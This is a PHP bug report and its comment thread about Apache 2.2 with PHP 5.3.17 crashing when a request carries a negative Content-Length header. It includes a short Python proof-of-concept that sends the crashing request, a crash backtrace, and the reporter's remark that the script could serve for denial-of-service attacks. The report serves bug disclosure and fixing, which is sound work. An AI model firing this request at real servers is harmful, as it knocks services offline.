Bug #63200 [Com]: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header

[thomas at partyflock dot nl]

Edit report at https://bugs.php.net/bug.php?id=63200&edit=1

 ID:                 63200
 Comment by:         thomas at partyflock dot nl
 Reported by:        chris at whyley dot com
 Summary:            Apache 2.2 crashes when PHP called with negative
                     Content-Length HTTP header
 Status:             Open
 Type:               Bug
 Package:            Reproducible crash
 Operating System:   Windows Server 2003
 PHP Version:        5.3.17
 Block user comment: N
 Private report:     N

 New Comment:

I had this in 5.4.4 on my production servers but not on an identical test 
server, 
which runs on a local domain but uses the same (version) php, apache and 
modules.

The test server always returns a normal 200 page on the test server though, 
don't 
ask me why.

Removing the custom ErrorDocument indeed solves the problem.


Previous Comments:
------------------------------------------------------------------------
[2013-02-18 11:08:42] chris at whyley dot com

Re-opening this bug as it still exists in the 5.3 stream.

------------------------------------------------------------------------
[2013-02-18 00:36:03] php-bugs at lists dot php dot net

No feedback was provided. The bug is being suspended because
we assume that you are no longer experiencing the problem.
If this is not the case and you are able to provide the
information that was requested earlier, please do so and
change the status of the bug back to "Open". Thank you.

------------------------------------------------------------------------
[2012-10-05 10:26:01] chris at whyley dot com

I have not tested this issue under version 5.4 as my environment is setup for 
5.3.17 - Are you able to recreate in 5.3.17 ?

It always crashes no matter what I have in index.php - in fact I can call any 
page and cause the crash to happen.

------------------------------------------------------------------------
[2012-10-05 04:26:26] larue...@php.net

I can not reproduce this with 5.4, and from the backtrace, it seems crash in 
another place.

so, is it related with your index.php?  does it always crash no matter what the 
index.php is?

------------------------------------------------------------------------
[2012-10-02 14:45:02] chris at whyley dot com

Description:
------------
Apache 2.2 with PHP 5.3.17 on Windows Server 2003 can be made to repeatably 
crash 
by doing the following:

(1) Configure your Apache server to use a custom error handling page for the 
HTTP 
413 error (Request entity too large) by inserting this line into your 
httpd.conf:

    ErrorDocument 413 /error/

(2) Run the Python test script detailed below to send an HTTP GET request to 
the 
server with a negative integer for the HTTP "Content-Length" header and with 
the 
"Accept-Encoding" header set to "gzip, deflate"

When this is run, Apache crashes with the following error:

[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length
[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 
3221225477 -- Restarting.

This issue is a particular problem in the wild where many modern browsers 
aren't 
capable of handling file uploads over 2GB in size - instead of posting an 
accurate filesize for the Content-Length header they use a negative integer 
instead, causing the Apache server running PHP to crash. For further 
information 
on this see http://www.motobit.com/help/scptutl/pa98.htm

The script could be used to perform DOS attacks on vulnerable systems.

Test script:
---------------
#!/usr/bin/python
 
import socket, sys
target = "10.211.55.3"
port   = 80;
request  = "GET / HTTP/1.1\n"
request += "Host: "+target+"\n"
request += "Accept-Encoding:    gzip, deflate\n"
request += "Content-Length: -1\n\n" 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
  s.connect((target, port))
except:
  print "[-] Connection to %s:%s failed!" % (target, port)
  sys.exit(0)
print "[+] Sending HTTP request. Check for crash on target."
s.send(request)
s.close()

Expected result:
----------------
Stable Apache, no crash.

Actual result:
--------------
Thread 2 - System ID 3008
Entry point   msvcrt!_endthreadex+3a 
Create time   10/2/2012 2:29:08 PM 
Time spent in user mode   0 Days 0:0:0.0 
Time spent in kernel mode   0 Days 0:0:0.15 


Full Call Stack

Function     Arg 1     Arg 2     Arg 3     Arg 4   Source 
php5ts!zend_hash_index_find+17     016f3460     0000000d     018ee6c0     
00000000   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_hash.c @ 985 
php5ts!_zend_list_delete+27     0000000d     016b0150     029811c0     016b0150 
  
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_list.c @ 55 + 27 
php5ts!_php_stream_free+ae     029811c0     00000003     016b0150     029811c0  
 
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\streams\streams.c @ 399 + a 
php5ts!php_zend_stream_mmap_closer+1a     029811c0     016b0150     0290a4e0    
 
007339f4   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1192 + 9 
php5ts!zend_file_handle_dtor+2a     0290a4e8     016b0150     00000000     
00000000   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_stream.c @ 316 + 8 
php5ts!file_handle_dtor+14     0290a4e8     018ee828     018ee798     00000000  
 
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_compile.c @ 174 + b 
php5ts!zend_llist_del_element+71     016b1754     018ee828     007d9810     
016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_llist.c @ 99 + 36 
php5ts!zend_destroy_file_handle+26     018ee828     016b0150     016b0150     
016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_language_scanner.l 
@ 
242 
php5ts!zend_execute_scripts+c4     00000002     016b0150     00000000     
00000001   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend.c @ 1234 
php5apache2_2!php_handler+64c     00fba200     006348e0     00fba200     
00000000   
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 671 
+ 
13 
libhttpd!ap_run_handler+25     00fba200     6eed3de0     00fba200     00634f68  
  
libhttpd!ap_invoke_handler+b0     00000000     00fb8938     018ee8f8     
6ff0ef68    
libhttpd!ap_internal_redirect+37     00634f68     00fb8938     00eb6c50     
0000019d    
libhttpd!ap_die+1e8     00fb8938     00000000     00000001     00fba118    
libhttpd!ap_http_header_filter+9f     00fb96f8     00fba118     00fba118     
018ee974    
libhttpd!ap_pass_brigade+52     00fb96f8     00fba118     00000000     00fba118 
   
libhttpd!ap_content_length_filter+a9     00fb96e0     00eb6cb0     00fb96c8     
018ee9e0    
libhttpd!ap_pass_brigade+52     00fb96e0     00fba118     6fba4309     00fba118 
   
libhttpd!ap_byterange_filter+474     00fb96c8     00fba118     00fba060     
018eea1c    
libhttpd!ap_pass_brigade+52     00fb96c8     00fba118     00eb6cb0     00fba118 
   
mod_deflate+1352     00fba060     00fba118     00fba0c0     018eea58    
libhttpd!ap_pass_brigade+52     00fba060     00fba118     00fba080     00fba190 
   
mod_deflate+1aa1     00fc5a48     00fba1b0     00fba190     018eea84    
libhttpd!ap_pass_brigade+52     00fc5a48     00fba190     00fb9938     00fba190 
   
libhttpd!ap_old_write_filter+5b     00fba080     00fba190     00fba190     
018eeab4    
libhttpd!ap_pass_brigade+52     00fba080     00fba190     00fb9878     00fba138 
   
libhttpd!ap_set_etag+b28     00fba138     00fb9938     0000019d     6ff37324    
libhttpd!ap_set_etag+2bb     00fba190     00fb9e08     00000000     00000000    
libhttpd!ap_get_brigade+24     00fb9938     00fb9e08     00000000     00000000  
  
php5apache2_2!php_apache_sapi_read_post+3d     018eeb68     00000f9f     
00000f9f     
016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-
5.3.17\sapi\apache2handler\sapi_apache2.c @ 201 + 1a 
php5ts!sapi_deactivate+6f     016b0150     016b0150     00000000     00fb8938   
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\sapi.c @ 423 + d 
php5ts!php_request_shutdown+3a6     00000000     00000004     00637170     
00fb8938   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1670 + 6 
php5apache2_2!php_handler+6b1     00fb8938     006348e0     00fb8938     
00000000   
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 682 
libhttpd!ap_run_handler+25     00fb8938     00fb8938     00fb8938     00000000  
  
libhttpd!ap_invoke_handler+b0     00000000     00fb7958     018eff38     
6ff0adbc    
libhttpd!ap_die+29e     00fb8938     00000000     006535b0     00fb7958    
libhttpd!ap_get_request_note+1d0c     00fb7958     00fb7958     00fb7958     
00000001    
libhttpd!ap_run_process_connection+25     00fb7958     005c4488     018eff80    
 
6ff1df6c    
libhttpd!ap_process_connection+33     00fb7958     00eb49f8     7c911086     
00eb0448    
libhttpd!ap_regkey_value_remove+c7c     00fb7950     7c911086     7c9101db     
00ea2120    
msvcrt!_endthreadex+a9     00ea2120     7c911086     7c9101db     00ea2120    
kernel32!BaseThreadStart+37     77c3a341     00ea2120     00000000     00000000 
   


Exception Information
PHP5TS!ZEND_HASH_INDEX_FIND+17In 
httpd__PID__3560__Date__10_02_2012__Time_02_29_32PM__453__Second_Chance_Exception
_C0000005.dmp the assembly instruction at php5ts!zend_hash_index_find+17 in 
C:\Core\PHP-5317\php5ts.dll from The PHP Group has caused an access violation 
exception (0xC0000005) when trying to read from memory location 0x0d3e2d2d on 
thread 2


------------------------------------------------------------------------



-- 
Edit this bug report at https://bugs.php.net/bug.php?id=63200&edit=1